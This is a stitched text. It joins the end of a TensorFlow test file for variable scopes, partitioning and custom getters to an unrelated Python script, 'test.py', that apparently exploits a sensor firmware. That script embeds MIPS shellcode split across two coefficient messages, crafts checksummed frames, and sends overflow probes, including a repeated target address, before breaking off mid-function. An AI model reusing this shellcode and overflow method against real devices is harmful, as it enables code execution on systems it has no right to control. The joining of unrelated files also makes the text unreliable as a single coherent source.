      # Ops are created outside the variable scope's name.
      self.assertEqual(constant_op.constant([], name="c").name, "c:0")
    # Recheck: no "default" name scope was created above.
    with ops.name_scope("default"):
      self.assertEqual(constant_op.constant([], name="c").name, "default/c:0")
    with variable_scope.variable_scope("outer"):
      with variable_scope.variable_scope(
          None, default_name="default", auxiliary_name_scope=False) as inner:
        self.assertEqual(inner.original_name_scope, "outer/")
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        self.assertEqual(constant_op.constant([], name="c").name, "outer/c:0")
      # Recheck: no "default" name scope was created under "outer" above.
      with ops.name_scope("default"):
        self.assertEqual(
            constant_op.constant([], name="c").name, "outer/default/c:0")
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
  """Re-entering the root scope with auxiliary_name_scope=False."""
  with self.test_session():
    root_scope = variable_scope.get_variable_scope()
    with variable_scope.variable_scope(
        root_scope, auxiliary_name_scope=False) as scope:
      self.assertEqual(scope.original_name_scope, "")
      self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
      self.assertEqual(constant_op.constant([], name="c").name, "c:0")
    with variable_scope.variable_scope("outer"):
      # Variables go to the root; ops stay in the surrounding "outer" scope.
      with variable_scope.variable_scope(
          root_scope, auxiliary_name_scope=False) as inner:
        self.assertEqual(inner.original_name_scope, "")
        self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
        self.assertEqual(
            constant_op.constant([], name="c1").name, "outer/c1:0")
def testAuxiliaryNameScopeIsInvalid(self):
  """A non-boolean auxiliary_name_scope raises TypeError in every form."""
  with self.test_session():
    # Scope given by default name.
    with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"), \
        variable_scope.variable_scope(
            None, default_name="scope", auxiliary_name_scope="invalid"):
      pass
    # Scope given by explicit name.
    with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"), \
        variable_scope.variable_scope(
            "scope", auxiliary_name_scope="invalid"):
      pass
    with variable_scope.variable_scope("scope") as scope:
      pass
    # Scope given by a scope object.
    with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"), \
        variable_scope.variable_scope(
            scope, auxiliary_name_scope="invalid"):
      pass
def testReuseScopeWithoutNameScopeCollision(self):
  """Reusing a scope with auxiliary_name_scope=False avoids name collisions.

  Github issue: #13429
  """
  with self.test_session():
    with variable_scope.variable_scope("outer"):
      with variable_scope.variable_scope("inner") as inner:
        pass
    with variable_scope.variable_scope(
        inner, auxiliary_name_scope=False) as scope:
      # Manually re-enter the original name scope to place ops there.
      with ops.name_scope(scope.original_name_scope):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/inner/w:0")
        self.assertEqual(
            constant_op.constant([], name="c").name, "outer/inner/c:0")
    # No top-level "inner" name scope was consumed above.
    with ops.name_scope("inner"):
      self.assertEqual(constant_op.constant([], name="c").name, "inner/c:0")
    with variable_scope.variable_scope("another"):
      with variable_scope.variable_scope(
          inner, auxiliary_name_scope=False) as scope1:
        with ops.name_scope(scope1.original_name_scope):
          self.assertEqual(
              variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
          self.assertEqual(
              constant_op.constant([], name="c1").name, "outer/inner/c1:0")
      # "another/inner" is still free for a fresh name scope.
      with ops.name_scope("inner"):
        self.assertEqual(
            constant_op.constant([], name="c").name, "another/inner/c:0")
@test_util.run_in_graph_and_eager_modes()
def testGetLocalVar(self):
  """get_local_variable: naming, collection membership, and reuse."""
  # Check that local variable respects naming.
  with variable_scope.variable_scope("outer") as outer:
    with variable_scope.variable_scope(outer, "default", []):
      local_var = variable_scope.get_local_variable(
          "w", [], collections=["foo"])
      self.assertEqual(local_var.name, "outer/w:0")
  if not context.executing_eagerly():
    # Since variable is local, it should be in the local variable collection
    # but not the trainable collection.
    self.assertIn(local_var,
                  ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
    self.assertIn(local_var, ops.get_collection("foo"))
    self.assertNotIn(local_var,
                     ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
    # Check that local variable respects `reuse`.
    with variable_scope.variable_scope(outer, "default", reuse=True):
      self.assertEqual(
          variable_scope.get_local_variable("w", []).name, "outer/w:0")
def testGetVarWithDevice(self):
  """A device function observes variable ops and their declared dtypes."""
  recorded = []

  def record_and_place(op):
    # Record (name, dtype) for every variable-creating op; place all ops
    # on GPU:0.
    if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
      recorded.append((op.name, op.get_attr("dtype")))
    return "/device:GPU:0"

  graph = ops.Graph()
  with graph.as_default(), ops.device(record_and_place):
    _ = variable_scope.get_variable("x", (100, 200))
    _ = variable_scope.get_variable(
        "y", dtype=dtypes.int64, initializer=numpy.arange(73))

  self.assertEqual(recorded[0], ("x", dtypes.float32))
  self.assertEqual(recorded[1], ("y", dtypes.int64))
def testGetCollection(self):
  """scope.get_collection filters graph collections by scope prefix."""
  with self.test_session():
    # Two root-level variables, one non-trainable.
    _ = variable_scope.get_variable("testGetCollection_a", [])
    _ = variable_scope.get_variable(
        "testGetCollection_b", [], trainable=False)
    with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
      _ = variable_scope.get_variable("testGetCollection_a", [])
      _ = variable_scope.get_variable(
          "testGetCollection_b", [], trainable=False)
      # Only this scope's trainable variable is returned.
      self.assertEqual([
          v.name
          for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
      ], ["testGetCollection_foo_/testGetCollection_a:0"])
      self.assertEqual([
          v.name
          for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
      ], [
          "testGetCollection_foo_/testGetCollection_a:0",
          "testGetCollection_foo_/testGetCollection_b:0"
      ])
    with variable_scope.variable_scope("testGetCollection_foo") as scope2:
      _ = variable_scope.get_variable("testGetCollection_a", [])
      _ = variable_scope.get_variable(
          "testGetCollection_b", [], trainable=False)
      self.assertEqual([
          v.name
          for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
      ], ["testGetCollection_foo/testGetCollection_a:0"])
      self.assertEqual([
          v.name
          for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
      ], [
          "testGetCollection_foo/testGetCollection_a:0",
          "testGetCollection_foo/testGetCollection_b:0"
      ])
    # The root scope sees everything created above.
    scope = variable_scope.get_variable_scope()
    self.assertEqual([
        v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
    ], [
        "testGetCollection_a:0", "testGetCollection_b:0",
        "testGetCollection_foo_/testGetCollection_a:0",
        "testGetCollection_foo_/testGetCollection_b:0",
        "testGetCollection_foo/testGetCollection_a:0",
        "testGetCollection_foo/testGetCollection_b:0"
    ])
    self.assertEqual([
        v.name
        for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
    ], [
        "testGetCollection_a:0",
        "testGetCollection_foo_/testGetCollection_a:0",
        "testGetCollection_foo/testGetCollection_a:0"
    ])
def testGetTrainableVariables(self):
  """trainable_variables() excludes outer-scope and non-trainable variables."""
  with self.test_session():
    # Created outside the scope: must not be reported by it.
    _ = variable_scope.get_variable("testGetTrainableVariables_a", [])
    with variable_scope.variable_scope(
        "testGetTrainableVariables_foo") as scope:
      _ = variable_scope.get_variable("testGetTrainableVariables_b", [])
      # trainable=False keeps this one out of the trainable collection.
      _ = variable_scope.get_variable(
          "testGetTrainableVariables_c", [], trainable=False)
    names = [v.name for v in scope.trainable_variables()]
    self.assertEqual(
        names,
        ["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
def testGetGlobalVariables(self):
  """global_variables() is restricted to variables created in the scope."""
  with self.test_session():
    # Root-level variable: not part of the scope below.
    _ = variable_scope.get_variable("testGetGlobalVariables_a", [])
    with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
      _ = variable_scope.get_variable("testGetGlobalVariables_b", [])
    names = [v.name for v in scope.global_variables()]
    self.assertEqual(
        names, ["testGetGlobalVariables_foo/testGetGlobalVariables_b:0"])
def testGetLocalVariables(self):
  """local_variables() reports only the scope's LOCAL_VARIABLES entries."""
  with self.test_session():
    # Local variable outside the scope: not reported.
    _ = variable_scope.get_variable(
        "a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
    with variable_scope.variable_scope("foo") as scope:
      _ = variable_scope.get_variable(
          "b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
      # Global variable in the scope: also not reported as local.
      _ = variable_scope.get_variable("c", [])
    names = [v.name for v in scope.local_variables()]
    self.assertEqual(names, ["foo/b:0"])
def testGetVariableWithRefDtype(self):
  """get_variable accepts a dtype taken from another variable (a _ref dtype)."""
  first = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
  # Ensure it is possible to do get_variable with a _ref dtype passed in.
  _ = variable_scope.get_variable("w", shape=[5, 6], dtype=first.dtype)
def testTwoGraphs(self):
  """An invalid scope name is rejected even under nested default graphs."""

  def open_invalid_scope():
    outer_graph = ops.Graph()
    inner_graph = ops.Graph()
    with outer_graph.as_default(), inner_graph.as_default():
      # "_" is not a valid scope name, regardless of graph nesting.
      with variable_scope.variable_scope("_"):
        pass

  self.assertRaisesRegexp(
      ValueError, "'_' is not a valid scope name", open_invalid_scope)
def axis0_into1_partitioner(shape=None, **unused_kwargs):
  """Partitioner that leaves every axis unpartitioned (one part per axis)."""
  return [1 for _ in shape]
def axis0_into2_partitioner(shape=None, **unused_kwargs):
  """Partitioner that splits axis 0 into 2 parts; other axes unpartitioned."""
  partitions = [1 for _ in shape]
  partitions[0] = 2
  return partitions
def axis0_into3_partitioner(shape=None, **unused_kwargs):
  """Partitioner that splits axis 0 into 3 parts; other axes unpartitioned."""
  partitions = [1 for _ in shape]
  partitions[0] = 3
  return partitions
class VariableScopeWithPartitioningTest(test.TestCase):
  """Tests for variable scopes that carry a `partitioner`."""

  def testResultNameMatchesRequested(self):
    """A partitioned variable keeps the requested name; parts get suffixes."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner):
      v = variable_scope.get_variable("name0", shape=(3, 1, 1))
      self.assertEqual(v.name, "scope0/name0")
      v_concat = v.as_tensor()
      self.assertEqual(v_concat.name, "scope0/name0:0")
      variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
      # Two parts were created (axis 0 split into 2), no third.
      self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
      self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
      self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])

  def testBreaksIfPartitioningChanges(self):
    """Reusing a partitioned variable with different partitioning fails."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner):
      variable_scope.get_variable("name0", shape=(3, 1, 1))
    # Reuse with more partitions than were created.
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into3_partitioner, reuse=True):
      with self.assertRaisesRegexp(
          ValueError,
          "Trying to reuse partitioned variable .* but specified partitions "
          ".* and found partitions .*"):
        variable_scope.get_variable("name0", shape=(3, 1, 1))
    # Reuse with fewer partitions than were created.
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into1_partitioner, reuse=True):
      with self.assertRaisesRegexp(
          ValueError,
          "Trying to reuse partitioned variable .* but specified partitions "
          ".* and found partitions .*"):
        variable_scope.get_variable("name0", shape=(3, 1, 1))

  def testReturnsExistingConcatenatedValueIfReuse(self):
    """Reuse of a partitioned variable returns the same concatenated value."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner):
      v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
      variable_scope.get_variable_scope().reuse_variables()
      v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
      self.assertEqual(v_concat, v_concat_2)

  def testAllowsReuseWithoutPartitioner(self):
    """A partitioned variable can be reused from a scope with no partitioner."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner):
      v = variable_scope.get_variable("name0", shape=(3, 1, 1))
    with variable_scope.variable_scope("scope0", reuse=True):
      v_reused = variable_scope.get_variable("name0")
    self.assertEqual(v, v_reused)

  def testPropagatePartitionerOnReopening(self):
    """Re-entering a scope object keeps its partitioner."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner) as vs:
      self.assertEqual(axis0_into2_partitioner, vs.partitioner)
      with variable_scope.variable_scope(vs) as vs1:
        self.assertEqual(axis0_into2_partitioner, vs1.partitioner)

  def testScalarIgnoresPartitioner(self):
    """Scalar variables are never partitioned, even with a partitioner set."""
    with variable_scope.variable_scope(
        "scope0", partitioner=axis0_into2_partitioner):
      v = variable_scope.get_variable("name0", shape=())
      self.assertEqual(v.name, "scope0/name0:0")
      variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
      self.assertIn("scope0/name0:0", [x.name for x in variables])

  def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
    """Parts are sliced along the axis the partitioner designates."""

    def _part_axis_0(**unused_kwargs):
      # Split axis 0 into two parts.
      return (2, 1, 1)

    def _part_axis_1(**unused_kwargs):
      # Split axis 1 into two parts.
      return (1, 2, 1)

    with variable_scope.variable_scope("root", use_resource=use_resource):
      v0 = variable_scope.get_variable(
          "n0", shape=(2, 2, 2), partitioner=_part_axis_0)
      v1 = variable_scope.get_variable(
          "n1", shape=(2, 2, 2), partitioner=_part_axis_1)

    # The concatenated variables report the full shape.
    self.assertEqual(v0.get_shape(), (2, 2, 2))
    self.assertEqual(v1.get_shape(), (2, 2, 2))

    # v0 was split along axis 0: each part is (1, 2, 2).
    n0_0 = list(v0)[0]
    n0_1 = list(v0)[1]
    self.assertEqual(n0_0.get_shape(), (1, 2, 2))
    self.assertEqual(n0_1.get_shape(), (1, 2, 2))

    # v1 was split along axis 1: each part is (2, 1, 2).
    n1_0 = list(v1)[0]
    n1_1 = list(v1)[1]
    self.assertEqual(n1_0.get_shape(), (2, 1, 2))
    self.assertEqual(n1_1.get_shape(), (2, 1, 2))

  def testPartitionConcatenatesAlongCorrectAxis(self):
    self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)

  def testPartitionConcatenatesAlongCorrectAxisResource(self):
    self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
  """Tests for `custom_getter` on scopes and for variable-creator scopes."""

  def testNonCallableGetterFails(self):
    """A non-callable custom_getter is rejected by scope and get_variable."""
    with self.assertRaisesRegexp(ValueError,
                                 r"custom_getter .* not callable:"):
      with variable_scope.variable_scope("scope0", custom_getter=3):
        variable_scope.get_variable("name0")
    with self.assertRaisesRegexp(ValueError,
                                 r"custom_getter .* not callable:"):
      variable_scope.get_variable("name0", custom_getter=3)

  def testNoSideEffectsWithIdentityCustomGetter(self):
    """An identity custom_getter does not change which variables come back."""
    called = [0]

    def custom_getter(getter, *args, **kwargs):
      # Count invocations but otherwise pass straight through.
      called[0] += 1
      return getter(*args, **kwargs)

    with variable_scope.variable_scope(
        "scope", custom_getter=custom_getter) as scope:
      v = variable_scope.get_variable("v", [1])
    with variable_scope.variable_scope(scope, reuse=True):
      v2 = variable_scope.get_variable("v", [1])
    # new_scope has no custom getter, so v3's creation is not counted.
    with variable_scope.variable_scope("new_scope") as new_scope:
      v3 = variable_scope.get_variable("v3", [1])
    with variable_scope.variable_scope(
        new_scope, reuse=True, custom_getter=custom_getter):
      v4 = variable_scope.get_variable("v3", [1])
    self.assertEqual(v, v2)
    self.assertEqual(v3, v4)
    self.assertEqual(3, called[0])  # skipped one in the first new_scope

  def testCustomGetterWithReuse(self):
    """A custom getter can branch on the kwargs["reuse"] flag."""
    # Custom getter can choose to behave differently on reused variables.
    def custom_getter(getter, *args, **kwargs):
      var = getter(*args, **kwargs)
      if kwargs["reuse"]:
        # This can be used, e.g., for changing the caching device if needed.
        return array_ops.identity(var, name="reused")
      else:
        return array_ops.identity(var, name="not_reused")

    with variable_scope.variable_scope(
        "scope", custom_getter=custom_getter) as scope:
      v = variable_scope.get_variable("v", [1])
    with variable_scope.variable_scope(scope, reuse=True):
      v2 = variable_scope.get_variable("v", [1])
    self.assertEqual(v.name, "not_reused:0")
    self.assertEqual(v2.name, "reused:0")

  def testGetterThatCreatesTwoVariablesAndSumsThem(self):
    """A custom getter may create several variables and return a derived op."""

    def custom_getter(getter, name, *args, **kwargs):
      # Create two underlying variables and return their sum.
      g_0 = getter("%s/0" % name, *args, **kwargs)
      g_1 = getter("%s/1" % name, *args, **kwargs)
      with ops.name_scope("custom_getter"):
        return g_0 + g_1

    with variable_scope.variable_scope("scope", custom_getter=custom_getter):
      v = variable_scope.get_variable("v", [1, 2, 3])
    self.assertEqual([1, 2, 3], v.get_shape())
    true_vars = variables_lib.trainable_variables()
    self.assertEqual(2, len(true_vars))
    self.assertEqual("scope/v/0:0", true_vars[0].name)
    self.assertEqual("scope/v/1:0", true_vars[1].name)
    # The returned value is the add op, not a variable.
    self.assertEqual("custom_getter/add:0", v.name)
    with self.test_session() as sess:
      variables_lib.global_variables_initializer().run()
      np_vars, np_v = sess.run([true_vars, v])
      self.assertAllClose(np_v, sum(np_vars))

  def testNestedCustomGetters(self):
    """Nested custom getters compose: each wraps the next one inward."""

    def sum_getter(getter, name, *args, **kwargs):
      g_0 = getter("%s/sum_0" % name, *args, **kwargs)
      g_1 = getter("%s/sum_1" % name, *args, **kwargs)
      with ops.name_scope("sum_getter"):
        return g_0 + g_1

    def prod_getter(getter, name, *args, **kwargs):
      g_0 = getter("%s/prod_0" % name, *args, **kwargs)
      g_1 = getter("%s/prod_1" % name, *args, **kwargs)
      with ops.name_scope("prod_getter"):
        return g_0 * g_1

    with variable_scope.variable_scope(
        "prod_scope", custom_getter=prod_getter):
      with variable_scope.variable_scope(
          "sum_scope", custom_getter=sum_getter):
        with variable_scope.variable_scope(
            "inner_sum_scope", custom_getter=sum_getter):
          # take sums of sums of products
          v = variable_scope.get_variable("v", [1, 2, 3])
    self.assertEqual([1, 2, 3], v.get_shape())
    true_vars = variables_lib.trainable_variables()
    # 2 (inner sum) * 2 (outer sum) * 2 (product) = 8 underlying variables.
    self.assertEqual(8, len(true_vars))
    template = (
        "prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
    self.assertEqual(template % (0, 0, 0), true_vars[0].name)
    self.assertEqual(template % (0, 0, 1), true_vars[1].name)
    self.assertEqual(template % (0, 1, 0), true_vars[2].name)
    self.assertEqual(template % (0, 1, 1), true_vars[3].name)
    self.assertEqual(template % (1, 0, 0), true_vars[4].name)
    self.assertEqual(template % (1, 0, 1), true_vars[5].name)
    self.assertEqual(template % (1, 1, 0), true_vars[6].name)
    self.assertEqual(template % (1, 1, 1), true_vars[7].name)
    with self.test_session() as sess:
      variables_lib.global_variables_initializer().run()
      np_vars, np_v = sess.run([true_vars, v])
      # take products of sums of products
      self.assertAllClose(
          np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
              (np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))

  def testVariableCreator(self):
    """Variable creators chain: the inner creator runs first, then the outer."""
    variable_names = []

    def creator_a(next_creator, **kwargs):
      # Runs second (outer): sees the name forced by creator_b.
      variable_names.append(kwargs.get("name", ""))
      return next_creator(**kwargs)

    def creator_b(next_creator, **kwargs):
      # Runs first (inner): overrides the requested name.
      kwargs["name"] = "forced_name"
      return next_creator(**kwargs)

    with variable_scope.variable_creator_scope(creator_a):
      with variable_scope.variable_creator_scope(creator_b):
        variable_scope.variable(1.0, name="one_name")
    self.assertAllEqual(variable_names, ["forced_name"])
class PartitionInfoTest(test.TestCase):
  """Tests for `variable_scope._PartitionInfo` validation and helpers."""

  def testConstructorChecks(self):
    """Constructor rejects wrong types, mismatched ranks, and bad offsets."""
    # Invalid arg types.
    with self.assertRaises(TypeError):
      variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
    with self.assertRaises(TypeError):
      variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
    with self.assertRaises(TypeError):
      variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
    with self.assertRaises(TypeError):
      variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
    # full_shape and var_offset must have same length.
    with self.assertRaises(ValueError):
      variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
    # Offset must always be less than shape.
    with self.assertRaises(ValueError):
      variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])

  def testSingleOffset(self):
    """single_offset returns the offset along the single partitioned axis."""
    partition_info = variable_scope._PartitionInfo(
        full_shape=[9, 3], var_offset=[4, 0])
    self.assertEqual(4, partition_info.single_offset([1, 3]))
    # Tests when the variable isn't partitioned at all.
    partition_info = variable_scope._PartitionInfo(
        full_shape=[9, 3], var_offset=[0, 0])
    self.assertEqual(0, partition_info.single_offset([9, 3]))

  def testSingleSliceDim(self):
    """single_slice_dim finds the one sliced axis or raises when ambiguous."""
    partition_info = variable_scope._PartitionInfo(
        full_shape=[9, 3], var_offset=[4, 0])
    # Invalid shape.
    with self.assertRaises(TypeError):
      partition_info.single_slice_dim(None)
    # Rank of shape differs from full_shape.
    with self.assertRaises(ValueError):
      partition_info.single_slice_dim([1, 2, 3])
    # Shape is too large given var_offset (4+6 > 9).
    with self.assertRaises(ValueError):
      partition_info.single_slice_dim([6, 3])
    # Multiple possible slice dim from shape.
    with self.assertRaises(ValueError):
      partition_info.single_slice_dim([1, 1])
    partition_info = variable_scope._PartitionInfo(
        full_shape=[9, 3], var_offset=[0, 0])
    self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
    partition_info = variable_scope._PartitionInfo(
        full_shape=[9, 3], var_offset=[4, 0])
    self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
  """Checks variable-scope semantics when several threads share one graph.

  Fix: replaced the deprecated ``assertEquals`` alias with ``assertEqual``
  (the alias emits DeprecationWarning and was removed in newer unittest).
  """

  def testTwoThreadsDisjointScopeEntry(self):

    def thread_fn(i, graph):
      with graph.as_default():
        with variable_scope.variable_scope("foo"):
          if i == 0:
            v = variable_scope.get_variable("v", [])
            self.assertEqual("foo/v:0", v.name)
          else:
            # Any thread after the first one should fail to create variable
            # with the same name.
            with self.assertRaises(ValueError):
              variable_scope.get_variable("v", [])

    graph = ops.get_default_graph()
    threads = [
        threading.Thread(target=thread_fn, args=(
            i,
            graph,
        )) for i in range(2)
    ]

    threads[0].start()
    # Allow thread 0 to finish before starting thread 1.
    threads[0].join()
    threads[1].start()
    threads[1].join()

  def testTwoThreadsNestedScopeEntry(self):

    def thread_fn(i, graph, run_event, pause_event):
      with graph.as_default():
        with variable_scope.variable_scope("foo"):
          if i == 0:
            v = variable_scope.get_variable("v", [])
            self.assertEqual("foo/v:0", v.name)
          else:
            # Any thread after the first one should fail to create variable
            # with the same name.
            with self.assertRaises(ValueError):
              variable_scope.get_variable("v", [])
          # Both threads hold their scope open while the other runs.
          pause_event.set()
          run_event.wait()

    graph = ops.get_default_graph()
    run_events = [threading.Event() for _ in range(2)]
    pause_events = [threading.Event() for _ in range(2)]
    threads = [
        threading.Thread(
            target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
        for i in range(2)
    ]

    # Start first thread.
    threads[0].start()
    pause_events[0].wait()
    # Start next thread once the first thread has paused.
    threads[1].start()
    pause_events[1].wait()
    # Resume both threads.
    run_events[0].set()
    run_events[1].set()
    threads[0].join()
    threads[1].join()

  def testReenterMainScope(self):

    def thread_fn(graph, main_thread_scope):
      with graph.as_default():
        # Variable created with main scope will have prefix "main".
        with variable_scope.variable_scope(main_thread_scope):
          with variable_scope.variable_scope("foo"):
            v = variable_scope.get_variable("v", [])
            self.assertEqual("main/foo/v:0", v.name)

        # Variable created outside main scope will not have prefix "main".
        with variable_scope.variable_scope("bar"):
          v = variable_scope.get_variable("v", [])
          self.assertEqual("bar/v:0", v.name)

    graph = ops.get_default_graph()
    with variable_scope.variable_scope("main") as main_thread_scope:
      thread = threading.Thread(
          target=thread_fn, args=(graph, main_thread_scope))
      thread.start()
      thread.join()
# Run the TensorFlow test runner when this file is executed directly.
if __name__ == "__main__":
  test.main()
|
test.py | #!/bin/python3
import subprocess
import time
import struct
import sys
import threading
import socket
import os
# MIPS shellcode payload; it is delivered to the target in two 56-byte
# coefficient messages (SET_COEFFICIENTS1 / SET_COEFFICIENTS2 payload slots).
shellcode = b"\x04\x00\r4\x04\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\xff\xff\x08!\xf0\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00"
# Split into two 56-byte halves; pad the second half to a full block.
shellcode_part1 = shellcode[0:56]
shellcode_part2 = shellcode[56:]
shellcode_part2 += b'\x00' * (56-len(shellcode_part2))

# Message-type opcodes understood by the sensor firmware (byte 2 of a frame).
ENABLE_SENSOR = 0x10
DISABLE_SENSOR = 0x20
SET_COEFFICIENTS1 = 0x31
SET_COEFFICIENTS2 = 0x32
SET_BIAS = 0x40
SET_TWO_POINTS = 0x50
UPDATE_FILTERS = 0x60
def receive_output(fsock):
    """Drain fsock.stdout in 16-byte chunks, echoing each chunk to stderr.

    Runs until EOF (an empty read); intended to be used as a background
    thread target while the exploit drives stdin.
    """
    while True:
        data = fsock.stdout.read(16)
        if not data:
            break
        sys.stderr.write("received {} bytes of data\n".format(len(data)))
        print(data, file=sys.stderr)
        sys.stderr.flush()
def do_checksum(message):
    """Stamp the frame checksum into byte 60 and return the frame.

    The checksum is the one's complement (0xff - sum) of the low byte of
    the sum of bytes 2..59 (type, length and payload fields).
    """
    total = sum(message[i + 2] for i in range(0, 58))
    message[60] = (0xff - (total & 0xff)) & 0xff
    return message
def send_coefficients(channel, messageType, coefficients):
    """Frame a 56-byte coefficient block as a sensor message and write it
    to the target's stdin.

    messageType is SET_COEFFICIENTS1 or SET_COEFFICIENTS2; coefficients
    must be exactly 56 bytes (the payload slot message[4:60]).
    """
    message = bytearray(64)
    message[0] = 0xa5          # frame sync byte 1
    message[1] = 0x5a          # frame sync byte 2
    message[2] = messageType   # opcode
    message[3] = 56            # payload length
    message[4:60] = coefficients
    channel.stdin.write(do_checksum(message))
def send_bias(channel):
    """Send a SET_BIAS frame carrying one little-endian double (the bias).

    Fix: the checksum loop duplicated here (and in the other send_* helpers)
    is exactly do_checksum(); call the shared helper instead so the frame
    format is defined in one place.
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5                     # frame sync
    message[1] = 0x5a
    message[2] = SET_BIAS                 # opcode 0x40
    message[3] = 8                        # payload: one 8-byte double
    message[4:12] = struct.pack("d", 2.4319)
    channel.stdin.write(do_checksum(message))
def send_two_points(channel):
    """Send a SET_TWO_POINTS frame carrying two calibration doubles.

    Fix: replaced the duplicated inline checksum loop with the shared
    do_checksum() helper (same bytes, single definition of the format).
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5                     # frame sync
    message[1] = 0x5a
    message[2] = SET_TWO_POINTS           # opcode 0x50
    message[3] = 16                       # payload: two 8-byte doubles
    message[4:12] = struct.pack("d", 500.4319)
    message[12:20] = struct.pack("d", 10.8769)
    channel.stdin.write(do_checksum(message))
def send_enable(channel):
    """Send an ENABLE_SENSOR frame (no payload).

    Fix: replaced the duplicated inline checksum loop with the shared
    do_checksum() helper.
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5            # frame sync
    message[1] = 0x5a
    message[2] = ENABLE_SENSOR   # opcode 0x10
    message[3] = 0               # no payload
    channel.stdin.write(do_checksum(message))
def send_update(channel):
    """Send an UPDATE_FILTERS frame (no payload).

    Fix: replaced the duplicated inline checksum loop with the shared
    do_checksum() helper.
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5             # frame sync
    message[1] = 0x5a
    message[2] = UPDATE_FILTERS   # opcode 0x60
    message[3] = 0                # no payload
    channel.stdin.write(do_checksum(message))
def send_disable(channel):
    """Send a DISABLE_SENSOR frame (no payload).

    Fix: the original called channel.send(message), but every caller passes
    a subprocess.Popen (see main()), which has no .send attribute — the call
    raised AttributeError. Write to channel.stdin like every other sender.
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5             # frame sync
    message[1] = 0x5a
    message[2] = DISABLE_SENSOR   # opcode 0x20
    message[3] = 0                # no payload
    message = do_checksum(message)
    channel.stdin.write(message)
def send_test(channel):
    """Fuzz probe: send a frame whose 52-byte ASCII payload overruns the
    nominal type/length layout.

    Note: the checksum is deliberately written to byte 63 here, not the
    usual slot 60; the len() prints trace that the buffer stays 64 bytes.
    """
    message = bytearray(b'\x00'*64)
    print(len(message))
    message[0] = 0xa5   # frame sync
    message[1] = 0x5a
    print(len(message))
    message[2:54] = b'zABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy'
    print(len(message))
    total = sum(message[2:60])
    print(len(message))
    total = 0xff - (total & 0xff)
    print(len(message))
    message[63] = total & 0xff   # byte 63, NOT the standard checksum slot 60
    channel.stdin.write(message)
def send_buffer(channel):
    """Send a type-0x70 frame whose payload is the same 32-bit address
    (0xa01805a0) repeated four times.

    Note: like send_test(), the checksum lands in byte 63 rather than the
    standard slot 60; the len() prints trace the buffer size.
    """
    message = bytearray(b'\x00'*64)
    message[0] = 0xa5    # frame sync
    message[1] = 0x5a
    message[2] = 0x70    # opcode not among the named message types
    message[3] = 0x00
